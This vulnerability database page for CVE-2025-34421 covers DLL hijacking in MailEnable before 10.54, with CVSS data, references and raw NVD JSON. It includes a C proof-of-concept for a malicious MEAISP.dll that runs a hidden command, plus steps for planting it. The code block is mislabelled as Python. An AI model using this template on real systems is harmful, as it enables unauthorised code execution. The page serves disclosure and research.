CVE-2025-34421

Description

MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAISP.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAISP.DLL, which is then loaded on execution, resulting in attacker-controlled code running with the privileges of the process.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mailenable:mailenable:*:*:*:*:standard:*:*:* - VULNERABLE

MailEnable < 10.54

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-34421 PoC - MailEnable DLL Hijacking
// Compile as DLL: x86_64-w64-mingw32-gcc -shared -o MEAISP.dll poc.c

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            // Create reverse shell or execute malicious code
            WinExec("cmd.exe /c whoami > C:\\\\temp\\\\pwned.txt", SW_HIDE);
            // Alternatively: system("calc.exe") for demonstration
            MessageBox(NULL, "DLL Loaded by MailEnable", "CVE-2025-34421", MB_OK);
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

// Export function that MailEnable expects
__declspec(dllexport) int InitializeISAPI() {
    return 0;
}

// Attack steps:
// 1. Place compiled MEAISP.dll in MailEnable installation directory
// 2. Wait for or trigger MailEnable Administrator to start
// 3. Malicious DLL will be loaded and code executed

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-34421
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-34421
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-34421/
[4] VulDB https://vuldb.com/cve/CVE-2025-34421
[5] https://mailenable.com/Standard-ReleaseNotes.txt
[6] https://www.mailenable.com/
[7] https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaisp-dll

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-34421", "sourceIdentifier": "[email protected]", "published": "2025-12-10T16:16:25.713", "lastModified": "2025-12-23T14:10:09.570", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAISP.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAISP.DLL, which is then loaded on execution, resulting in attacker-controlled code running with the privileges of the process."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mailenable:mailenable:*:*:*:*:standard:*:*:*", "versionEndExcluding": "10.54", "matchCriteriaId": "E4DAB799-EDB6-48D7-A7FD-77D9910CB308"}]}]}], "references": [{"url": "https://mailenable.com/Standard-ReleaseNotes.txt", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.mailenable.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaisp-dll", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}